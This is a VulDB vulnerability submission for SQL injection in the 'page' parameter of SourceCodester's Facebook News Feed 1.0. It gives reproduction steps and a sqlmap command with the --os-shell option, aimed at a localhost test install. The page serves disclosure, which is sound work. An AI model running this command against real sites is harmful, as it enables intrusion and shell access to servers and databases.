Submeter #344502: SourceCodester facebook 1.0 SQL Injectioninformação

TítuloSourceCodester facebook 1.0 SQL Injection
Descrição# Exploit Title: Facebook News Feed - SQL Injection # Exploit Author: Raj # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache Description:- A SQL Injection issue in Facebook News Feed allows to get an complete Remote Access into the website. Access such as database, files and everything. ` Payload used:- python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell ` Vulnerable Parameter:- ?page= ` Steps to reproduce:- 1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only 2. In this we target our parameter as "page". 3. Now we are gonna use "SQLMap" tool and with this following command **python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell**
Utilizador
 Cyberraj (UID 59481)
Submissão25/05/2024 15h08 (há 2 anos)
Moderação25/05/2024 20h25 (5 hours later)
EstadoAceite
Entrada VulDB266302 [SourceCodester Facebook News Feed Like 1.0 index.php page Injeção SQL]
Pontos17

Do you need the next level of professionalism?

Upgrade your account now!